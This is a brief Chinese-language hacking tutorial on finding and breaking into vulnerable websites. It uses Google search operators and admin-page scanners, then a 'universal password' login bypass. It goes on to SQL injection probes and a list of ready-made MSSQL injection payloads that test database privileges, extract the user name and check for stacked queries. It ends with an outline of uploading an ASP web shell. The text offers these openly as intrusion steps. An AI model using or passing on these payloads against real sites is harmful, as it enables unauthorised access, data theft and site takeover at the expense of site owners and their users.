Google-黑客語法

我們知道要入侵一個有漏洞的網站肯定要去尋找這個網站怎么找這樣的網站呢
一般都是到谷歌和百度去的 谷歌個人喜歡點 為什么這么說谷歌比較輕松 百度限制太多了 入侵一個網站肯定要找他的后台吧 找后台如何找呢 可用工具 比如啊d和明小子或者御劍 我覺得御劍挺方便的 掃到后台先嘗試萬能密碼 'or'='or'在賬號密碼輸入萬能密碼嘗試 登錄不了再嘗試sql注入 如果登錄進去先找到數據庫備份因為有可能上傳馬的時候需要改成jpg格式而馬必須asp格式這樣就需要用到數據庫備份 然后找個能上傳東西的地方 拿webshell webshell的意思個人認為是網站執行環境
搜索引擎高級語法
intitle: 搜索網頁中的中的標題名中是否包含指定字
inurl 搜索url網址中包含的指點字符串
filetype 搜索特定文件
site 搜索特定區域名信息
這些語法可用來搜索你想要的網站和網站漏洞或者一些源碼搭建網站或者搜索后台
打開一個網站隨便打開一個網頁測試
sql注入最簡單的檢測漏洞
' 在網址最后面輸入'如果返回正常那百分之60是沒注入點的 如果返回是一些錯誤顯示那這個網站是有注入點的
比如www.baidu.com后面輸入’www.baidu.com'
e/Login.asp在網址最后面輸入 一般都是返回正常
and 1=2在網址最后面輸入 如果返回不是原來的頁面可以說這個網站是存在注入漏洞的
切記在網址后面是要空格的 比如www.baidu.com and 1=1 這個空格表示是百分之二十
然后猜解用戶名和密碼
手工猜解
//看看是什么權限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//檢測是否有讀取某數據庫的權限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
數字類型
and char(124)%2Buser%2Bchar(124)=0
字符類型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索類型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用戶名
and user>0
' and user>0 and ''='
檢測是否為SA權限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
檢測是不是MSSQL數據庫
and exists (select * from sysobjects);--
檢測是否支持多行
;declare @d int;--
或者工具
用啊d 啊d注入那輸入有漏洞的URL 猜解